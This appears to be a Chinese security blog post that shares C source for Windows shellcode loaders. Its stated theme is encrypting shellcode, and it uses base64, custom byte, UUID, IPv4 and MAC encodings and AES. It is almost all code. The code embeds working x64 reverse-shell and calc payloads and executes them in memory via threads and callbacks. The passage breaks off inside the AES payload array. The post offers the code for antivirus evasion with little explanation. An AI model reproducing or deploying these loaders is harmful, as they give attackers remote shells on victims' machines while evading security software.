一组shellcode加密方式(附源码)
写过不少关于shellcode的文章,可以参看以前的。正好看到一组对shellcode加密手法的源码,难度不大,推荐给大家,开个脑洞。这个包含:简单的 shellcode 加载器,编码器(base64 2023-2-28 23:15:51 Author: 渗透Xiao白帽(查看原文) 阅读量:42 收藏
写过不少关于shellcode的文章,可以参看以前的。正好看到一组对shellcode加密手法的源码,难度不大,推荐给大家,开个脑洞。这个包含:简单的 shellcode 加载器,编码器(base64 2023-2-28 23:15:51 Author: 渗透Xiao白帽(查看原文) 阅读量:42 收藏
写过不少关于shellcode的文章,可以参看以前的。正好看到一组对shellcode加密手法的源码,难度不大,推荐给大家,开个脑洞。这个包含:简单的 shellcode 加载器,编码器(base64 - 自定义 - UUID - IPv4 - MAC),加密器(AES),无文件加载器(Winhttp,Sockets)。截图如下:
不多说,上代码。
1、简单加载
#include <Windows.h>#include <stdio.h>int main() {// use payload/windows/x64/shell_reverse_tcp// generate -f cunsigned char payload[] ="\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52""\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48""\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9""\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41""\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48""\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01""\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48""\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0""\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c""\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0""\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04""\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59""\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48""\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00""\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f""\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff""\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb""\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c""\x63\x2e\x65\x78\x65\x00";LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!alloc_mem) {printf("Failed to Allocate memory (%u)\n", GetLastError());return -1;}MoveMemory(alloc_mem, payload, sizeof(payload));//RtlMoveMemory(alloc_mem, payload, sizeof(payload));DWORD oldProtect;if (!VirtualProtect(alloc_mem, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {printf("Failed to change memory protection (%u)\n", GetLastError());return -2;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to Create the thread (%u)\n", GetLastError());return -3;}printf("\n\nalloc_mem : %p\n", alloc_mem);WaitForSingleObject(tHandle, INFINITE);getchar();return 0;}
2、Encoding:
2-1、Base64 Loading
#include <windows.h>#include <stdio.h>#pragma comment (lib, "Crypt32.lib")int main(void) {// calc//const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";// reverse shellconst char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAATSZFuwDUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvgHSoKQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==";DWORD payloadLen = sizeof(payload);LPVOID alloc_mem = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!alloc_mem) {printf("Failed to allocate memory (%u)\n", GetLastError());return -1;}// base64 decodingif (!CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)alloc_mem, &payloadLen, NULL, NULL)) {printf("Failed to decode the payload(%u)\n", GetLastError());return -2;}DWORD OldProtect;if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {printf("Failed to change memory protection (%u)\n", GetLastError());return -3;}((void(*)())alloc_mem)();return 0;}
2-2、Custom Encoding:
#include <Windows.h>#include <stdio.h>// calc//unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4a, 0xbb, 0x3, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x4a, 0x8e, 0x8f, 0x2, 0x3, 0x1, 0x2, 0x42, 0xbc, 0x32, 0x8d, 0x70, 0x89, 0x100, 0xd7, 0xbc, 0xf2, 0xb6, 0xa4, 0x57, 0x43, 0xbb, 0xa8, 0x96, 0xbf, 0x9e, 0x101, 0xd6, 0x4a, 0x84, 0xc6, 0x29, 0x3e, 0x7, 0x7e, 0xb, 0x82, 0xfc, 0xe2, 0x76, 0x7, 0xbc, 0x49, 0x14, 0x74, 0x70, 0x6c, 0x1, 0x5b, 0x42, 0x8b, 0xdb, 0x101, 0xd6, 0x65, 0x62, 0x6e, 0x64, 0x30, 0x66, 0x7a, 0x66, 0x2 };// reverse shellunsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4b, 0xbf, 0x79, 0x74, 0x34, 0x60, 0x35, 0x33, 0x2, 0x1, 0x43, 0x57, 0x4b, 0x8a, 0xe8, 0x49, 0x83, 0xed, 0xa2, 0x2, 0x2, 0x1, 0x4b, 0x8a, 0xe7, 0x4a, 0xbe, 0x3, 0x2, 0x5, 0xd4, 0x65, 0x5d, 0xb1, 0xf, 0x42, 0x56, 0x4a, 0x8b, 0xe5, 0x4e, 0x8a, 0xf3, 0x42, 0xbc, 0x4d, 0x79, 0x27, 0x9, 0x100, 0xd7, 0x4d, 0x8b, 0xeb, 0x6a, 0x2, 0x3, 0x1, 0x2, 0x5a, 0x43, 0xbb, 0x2b, 0x81, 0x6d, 0x1, 0x101, 0xd6, 0x52, 0x51, 0x4f, 0x32, 0xcb, 0x4e, 0x33, 0xc1, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc3, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc2, 0x43, 0xbb, 0xec, 0x10, 0xe1, 0xe1, 0x101, 0xd6, 0x4a, 0x8a, 0xc9, 0x6b, 0x12, 0x42, 0x5a, 0x4d, 0x8b, 0xe3, 0x4a, 0x8a, 0xfb, 0x42, 0xbc, 0x9a, 0xa7, 0x75, 0x63, 0x100, 0xd7, 0x49, 0x83, 0xc5, 0x42, 0x3, 0x2, 0x1, 0x4b, 0xb9, 0x65, 0x6e, 0x66, 0x1, 0x2, 0x1, 0x2, 0x1, 0x43, 0x51, 0x43, 0x51, 0x4a, 0x8a, 0xe4, 0x58, 0x59, 0x58, 0x4f, 0x32, 0xc2, 0x6b, 0xf, 0x5a, 0x43, 0x51, 0xe4, 0xfd, 0x68, 0xc8, 0x46, 0x25, 0x56, 0x2, 0x3, 0x49, 0x8f, 0x45, 0x26, 0x19, 0xc8, 0x1, 0x6a, 0x49, 0x8b, 0xe7, 0x58, 0x51, 0x43, 0x51, 0x43, 0x51, 0x43, 0x51, 0x4b, 0x100, 0xc2, 0x42, 0x52, 0x4a, 0x101, 0xc9, 0x4f, 0x8a, 0xc3, 0x4d, 0x8b, 0xc2, 0x43, 0xbb, 0x7b, 0xcd, 0x41, 0x87, 0x101, 0xd6, 0x4a, 0x32, 0xd4, 0x49, 0x101, 0xcb, 0x8d, 0xf, 0x43, 0xbb, 0xa, 0x88, 0x1f, 0x61, 0x101, 0xd6, 0xbd, 0xe1, 0x1f, 0x2b, 0xc, 0x42, 0xbc, 0xa7, 0x97, 0xbe, 0x9f, 0x100, 0xd7, 0x49, 0x85, 0xc5, 0x2a, 0x3d, 0x8, 0x7d, 0xc, 0x81, 0xfd, 0xe1, 0x77, 0x6, 0xbd, 0x48, 0x15, 0x73, 0x71, 0x6b, 0x2, 0x5a, 0x43, 0x8a, 0xdc, 0x100, 0xd7 };DWORD payloadLen = sizeof(payload);void Decode(unsigned char* payload) {for (int i = 0; i < payloadLen; i++) {if (i % 2 == 0) {payload[i]--;}else {payload[i] -= 2;}}}int main() {LPVOID alloc_mem = VirtualAlloc(NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!alloc_mem) {printf("Failed to Allocate memory (%u)\n", GetLastError());return -1;}Decode(payload);CopyMemory(alloc_mem, payload, payloadLen);DWORD OldProtect;if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {printf("Failed to Change memory protection (%u)\n", GetLastError());return -2;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to create the Thread (%u)\n", GetLastError());return -3;}WaitForSingleObject(tHandle, INFINITE);return 0;}
2-3、UUID shellcode:
// Stephan Borosh (rvrsh3ll|@424f424f) & Matt Kingstone for the technique#include <Windows.h>#include <stdio.h>#include <Rpc.h>#pragma comment(lib, "Rpcrt4.lib")int main() {const char* uuids[] = {"e48348fc-e8f0-00c0-0000-415141505251","d2314856-4865-528b-6048-8b5218488b52","728b4820-4850-b70f-4a4a-4d31c94831c0","7c613cac-2c02-4120-c1c9-0d4101c1e2ed","48514152-528b-8b20-423c-4801d08b8088","48000000-c085-6774-4801-d0508b481844","4920408b-d001-56e3-48ff-c9418b348848","314dd601-48c9-c031-ac41-c1c90d4101c1","f175e038-034c-244c-0845-39d175d85844","4924408b-d001-4166-8b0c-48448b401c49","8b41d001-8804-0148-d041-5841585e595a","59415841-5a41-8348-ec20-4152ffe05841","8b485a59-e912-ff57-ffff-5d49be777332","0032335f-4100-4956-89e6-4881eca00100","e5894900-bc49-0002-04d2-645bb00d4154","4ce48949-f189-ba41-4c77-2607ffd54c89","010168ea-0000-4159-ba29-806b00ffd550","c9314d50-314d-48c0-ffc0-4889c248ffc0","41c18948-eaba-df0f-e0ff-d54889c76a10","894c5841-48e2-f989-41ba-99a57461ffd5","40c48148-0002-4900-b863-6d6400000000","41504100-4850-e289-5757-574d31c06a0d","e2504159-66fc-44c7-2454-0101488d4424","6800c618-8948-56e6-5041-504150415049","5041c0ff-ff49-4dc8-89c1-4c89c141ba79","ff863fcc-48d5-d231-48ff-ca8b0e41ba08","ff601d87-bbd5-1de0-2a0a-41baa695bd9d","8348d5ff-28c4-063c-7c0a-80fbe07505bb","6f721347-006a-4159-89da-ffd590909090"};HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);DWORD_PTR ptr = (DWORD_PTR)alloc_mem;int init = sizeof(uuids) / sizeof(uuids[0]);for (int i = 0; i < init; i++) {RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);if (status != RPC_S_OK) {printf("UuidFromStringA != RPC_S_OK\n");CloseHandle(alloc_mem);return -1;}ptr += 16;}EnumSystemLocalesA((LOCALE_ENUMPROCA)alloc_mem, 0);return 0;}
2-4、IPv4 shellcode:
#include <Windows.h>#include <stdio.h>#include <Ip2string.h>#pragma comment(lib, "Ntdll.lib")#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endifint main() {const char* IPv4s[] ={"252.72.131.228","240.232.192.0","0.0.65.81","65.80.82.81","86.72.49.210","101.72.139.82","96.72.139.82","24.72.139.82","32.72.139.114","80.72.15.183","74.74.77.49","201.72.49.192","172.60.97.124","2.44.32.65","193.201.13.65","1.193.226.237","82.65.81.72","139.82.32.139","66.60.72.1","208.139.128.136","0.0.0.72","133.192.116.103","72.1.208.80","139.72.24.68","139.64.32.73","1.208.227.86","72.255.201.65","139.52.136.72","1.214.77.49","201.72.49.192","172.65.193.201","13.65.1.193","56.224.117.241","76.3.76.36","8.69.57.209","117.216.88.68","139.64.36.73","1.208.102.65","139.12.72.68","139.64.28.73","1.208.65.139","4.136.72.1","208.65.88.65","88.94.89.90","65.88.65.89","65.90.72.131","236.32.65.82","255.224.88.65","89.90.72.139","18.233.87.255","255.255.93.73","190.119.115.50","95.51.50.0","0.65.86.73","137.230.72.129","236.160.1.0","0.73.137.229","73.188.2.0","4.210.100.91","176.26.65.84","73.137.228.76","137.241.65.186","76.119.38.7","255.213.76.137","234.104.1.1","0.0.89.65","186.41.128.107","0.255.213.80","80.77.49.201","77.49.192.72","255.192.72.137","194.72.255.192","72.137.193.65","186.234.15.223","224.255.213.72","137.199.106.16","65.88.76.137","226.72.137.249","65.186.153.165","116.97.255.213","72.129.196.64","2.0.0.73","184.99.109.100","0.0.0.0","0.65.80.65","80.72.137.226","87.87.87.77","49.192.106.13","89.65.80.226","252.102.199.68","36.84.1.1","72.141.68.36","24.198.0.104","72.137.230.86","80.65.80.65","80.65.80.73","255.192.65.80","73.255.200.77","137.193.76.137","193.65.186.121","204.63.134.255","213.72.49.210","72.255.202.139","14.65.186.8","135.29.96.255","213.187.224.29","42.10.65.186","166.149.189.157","255.213.72.131","196.40.60.6","124.10.128.251","224.117.5.187","71.19.114.111","106.0.89.65","137.218.255.213",};PCSTR Terminator = NULL;PVOID LpBaseAddress = NULL;PVOID LpBaseAddress2 = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);if (!hHeap) {printf("Failed to create a heap (%u)\n", GetLastError());return -1;}void* alloc_mem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);if (!alloc_mem) {printf("Failed to allocate memory on the heap (%u)\n", GetLastError());return -2;}DWORD_PTR ptr = (DWORD_PTR)alloc_mem;int init = sizeof(IPv4s) / sizeof(IPv4s[0]);for (int i = 0; i < init; i++) {RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)", IPv4s[i], STATUS, GetLastError());return FALSE;}ptr += 4;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to Create the thread (%u)\n", GetLastError());return -3;}WaitForSingleObject(tHandle, INFINITE);return 0;}
2-5、MAC shellcode:
#include <Windows.h>#include <stdio.h>#include <Ip2string.h>#pragma comment(lib, "Ntdll.lib")#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif#define _CRT_SECURE_NO_WARNINGS#pragma warning(disable:4996)#pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")int Error(const char* msg) {printf("%s (%u)", msg, GetLastError());return 1;}int main() {const char* MAC[] ={"90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90"};int rowLen = sizeof(MAC) / sizeof(MAC[0]);PCSTR Terminator = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);DWORD_PTR ptr = (DWORD_PTR)alloc_mem;for (int i = 0; i < rowLen; i++) {STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlEthernetStringToAddressA failed in %s result %x (%u)", MAC[i], STATUS, GetLastError());return FALSE;}ptr += 6;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to Create the thread (%u)\n", GetLastError());return -3;}WaitForSingleObject(tHandle, INFINITE);printf("alloc_mem\n", alloc_mem);getchar();return 0;}
3、Encrypting:
3-1、AES:
#include <Windows.h>#include <stdio.h>#include <wincrypt.h>#pragma comment (lib, "crypt32.lib")#pragma comment(lib, "ntdll")#define NtCurrentProcess() ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endifEXTERN_C NTSTATUS NtAllocateVirtualMemory(HANDLE ProcessHandle,PVOID* BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);EXTERN_C NTSTATUS NtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID* BaseAddress,IN OUT PSIZE_T RegionSize,IN ULONG NewProtect,OUT PULONG OldProtect);EXTERN_C NTSTATUS NtCreateThreadEx(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject(IN HANDLE Handle,IN BOOLEAN Alertable,IN PLARGE_INTEGER Timeout);void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {HCRYPTPROV hProv;HCRYPTHASH hHash;HCRYPTKEY hKey;if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {printf("Failed in CryptAcquireContextW (%u)\n", GetLastError());return;}if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {printf("Failed in CryptCreateHash (%u)\n", GetLastError());return;}if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {printf("Failed in CryptHashData (%u)\n", GetLastError());return;}if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {printf("Failed in CryptDeriveKey (%u)\n", GetLastError());return;}if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen)) {printf("Failed in CryptDecrypt (%u)\n", GetLastError());return;}CryptReleaseContext(hProv, 0);CryptDestroyHash(hHash);CryptDestroyKey(hKey);}int main(int argc, char** argv) {char AESkey[] = { 0x64, 0xb5, 0x31, 0xfe, 0xb3, 0x6b, 0xb3, 0x8c, 0x88, 0x6a, 0x4c, 0x38, 0xc, 0xcb, 0x19, 0x4a };unsigned char AESshellcode[] = { 0x8, 0x21, 0x22, 0xeb, 0xfa, 0xdb, 0x42, 0x9, 0x8e, 0x24, 0xb6, 0x10, 0xfb, 0x93, 0x5b, 0xfe, 0xc3, 0x9d, 0x75, 0x68, 0xcc, 0x35, 0xd0, 0xef, 0xfd, 0x23, 0x70, 0xe3, 0x1, 0x3d, 0x8f, 0xd0, 0xe6, 0x5b, 0x97, 0x5e, 0x79, 0x78, 0x55, 0xf9, 0xaf, 0x71, 0x67, 0x78, 0x3c, 0xd9, 0x4a, 0xe7, 0x81, 0xc, 0xe5, 0x50, 0x46, 0x47, 0xa, 0x2e, 0x79, 0x5b, 0x6f, 0x43, 0x4d, 0x10, 0x2d, 0x35, 0x93, 0x94, 0xdd, 0x8f, 0x36, 0x2d, 0x3, 0xed, 0x9, 0x33, 0xed, 0xe3, 0xe1, 0x43, 0x17, 0xb6, 0xff, 0xe9, 0x69, 0x33, 0x1c, 0x81, 0x83, 0xb, 0xbf, 0x13, 0x1c, 0x25, 0xd5, 0x2f, 0xb8, 0x90, 0x6d, 0x1e, 0xd3, 0x11, 0xd, 0x29, 0xf7, 0x13, 0xde, 0x7e, 0x71, 0x53, 0x7, 0x44, 0xf3, 0xf6, 0xf6, 0xc3, 0x54, 0xb3, 0xaa, 0xe1, 0xd6, 0xbf, 0x1e, 0xa, 0x9c, 0x25, 0x72, 0x9e, 0x8b, 0x54, 0x62, 0x1c, 0xd9, 0x72, 0xab, 0xbd, 0x30, 0x47, 0x65, 0xd2, 0x0, 0x45, 0xb, 0xc4, 0x16, 0xbb, 0x80, 0xf, 0xd4, 0x0, 0x22, 0x40, 0xd3, 0x4d, 0xbb, 0x3f, 0x64, 0xe1, 0xa8, 0x2a, 0x60, 0x1e, 0xd1, 0x0, 0xd9, 0xb3, 0x46, 0xb6, 0x1c, 0xd0, 0xe2, 0xe1, 0x7d, 0x99, 0x9f, 0x8a, 0x70, 0xd5, 0x7d, 0x9c, 0x88, 0xd, 0x2d, 0xbb, 0x4c, 0x2a, 0x3f, 0xeb, 0xfd, 0xdd, 0xad, 0x8f, 0xba, 0xcc, 0x87, 0x3, 0xcf, 0x8f, 0x15, 0x54, 0xc5, 0xc1, 0xa2, 0xcb, 0x9b, 0x14, 0xae, 0xcb, 0x8, 0xf, 0x5a, 0xae, 0x6d, 0x63, 0xf3, 0x82, 0xe2, 0xec, 0x79, 0xe0, 0x1c, 0xb1, 0x85, 0xa9, 0x22, 0xb0, 0x66, 0xe9, 0x73, 0xbe, 0xdc, 0xac, 0xdc, 0x7d, 0x2e, 0xac, 0x5d, 0x29, 0x23, 0x44, 0x11, 0xee, 0xbf, 0xc9, 0x60, 0xa2, 0x1e, 0x7, 0x6d, 0x9e, 0x56, 0xf2, 0xb4, 0x2a, 0xb6, 0x83, 0x4, 0xca, 0x7e, 0xcb, 0x7e, 0x63, 0x8a, 0x70, 0xa1, 0xe5, 0x1f, 0x6f, 0xa, 0x21, 0x2e, 0x5b, 0x4c, 0x6a, 0x62, 0x84, 0x70, 0x33, 0x84, 0xca, 0x48, 0x39, 0x6b, 0x64, 0xc6, 0x4, 0xc6, 0x6f, 0xe2, 0x6d, 0x29, 0xda, 0x78, 0x64, 0x59, 0x13, 0xfe, 0x2, 0x3, 0xd9, 0xe, 0x7e, 0x97, 0x10, 0x7c, 0xbd, 0x9a, 0xf1, 0xbf, 0xce, 0x4e, 0x4, 0xf1, 0x93, 0x25, 0x88, 0x52, 0x99, 0x44, 0xbd, 0x52, 0x7c, 0xfe, 0x2c, 0xdb, 0x50, 0x9, 0x3b, 0x2a, 0xd, 0x30, 0x73, 0x3c, 0x8c, 0xee, 0xec, 0xb8, 0xc8, 0xe3, 0x3d, 0x48, 0xed, 0xc0, 0x4b, 0xd1, 0x8d, 0x48, 0x0, 0x3, 0xd8, 0xc, 0xde, 0x69, 0xf9, 0xe, 0xda, 0x31, 0xfe, 0xb6, 0x77, 0xc4, 0x4d, 0x31, 0x25, 0xc5, 0xd1, 0xa1, 0x11, 0x22, 0x15, 0x8, 0xc7, 0xa5, 0x73, 0x19, 0x3a, 0x87, 0x5, 0xcc, 0x37, 0x34, 0xad, 0x8a, 0xfa, 0xae, 0x6b, 0xf8, 0x38, 0x4a, 0x5, 0x2e, 0x74, 0xda, 0x77, 0x2a, 0xa0, 0x4f, 0xab, 0xcd, 0xbb, 0x2e, 0x2f, 0xb8, 0xf7, 0xa1, 0x91, 0x8e, 0x42, 0x43, 0x85, 0xa, 0x6b, 0xfd, 0x6d, 0x37, 0xd8, 0xa, 0x53, 0x9f, 0x54, 0x49, 0x26, 0x2a, 0x6d, 0x9e, 0x85, 0x30, 0xe5, 0xc7, 0x91, 0x80, 0x75, 0x79, 0xc1, 0x2a, 0x87, 0xc9, 0xd0, 0x47, 0xdd, 0xc3, 0x9f, 0x66, 0xf0, 0x23, 0xf1, 0xa2, 0x4, 0x7e, 0xf1, 0xd7, 